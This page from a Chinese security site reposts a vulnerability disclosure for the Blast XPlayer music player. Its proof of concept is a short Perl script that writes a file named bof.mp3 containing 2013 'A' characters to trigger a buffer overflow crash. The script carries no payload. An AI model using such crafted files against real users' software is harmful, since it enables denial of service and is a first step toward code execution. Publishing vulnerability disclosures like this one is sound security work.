首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Blast XPlayer Local Buffer Overflow PoC
来源:0xflux77 at gmail.com 作者:flux77 发布时间:2013-09-29  
Title: Blast XPlayer Local Buffer Overflow PoC
Vendor: http://sourceforge.net/projects/blast-player/files/latest/download?source=dlp
Versions: Beta
Platform: nix*, windows
Bug: Buffer Overflow
  
  
-------------------------------------------------------
   
1) Introduction
2) Proof of concept
3) Credits
   
   
===========
1) Introduction
===========
   
This application is a music player application is very practical and simple. 
Easy to use and the capacity that is not too big only 5MB. 
with this application you can play music whenever you want to store in flashdisc 
and opened on the computer without having to install it first. 
This application is still in the Indonesian version, but will be present in the english version in a few days.
   
=====
2)proof of concept
=====
   
#!/usr/bin/perl
  
$bof = "A" x 2013;
$filename = "bof.mp3";
open (FILE,">$filename");
print FILE "$bof";
print "\ncreated!!!\n";
  
=====
3)Credits
=====
   
flux77
Contact : 0xflux77 at gmail.com

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Astium Remote Code Execution
·mod_accounting 0.5 Blind SQL I
·Nodejs js-yaml load() Code Exe
·Astium Remote Code Execution V
·ZeroShell Remote Code Executio
·Internet Explorer "wshom.ocx"
·Google Chrome 31.0 Webkit Audi
·Internet Explorer 7.0 "documen
·IBM AIX 6.1 / 7.1 - Local root
·HylaFAX+ 5.2.4 - 5.5.3 - Buffe
·Raidsonic NAS Devices Unauthen
·Apache Tomcat/JBoss EJBInvoker
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved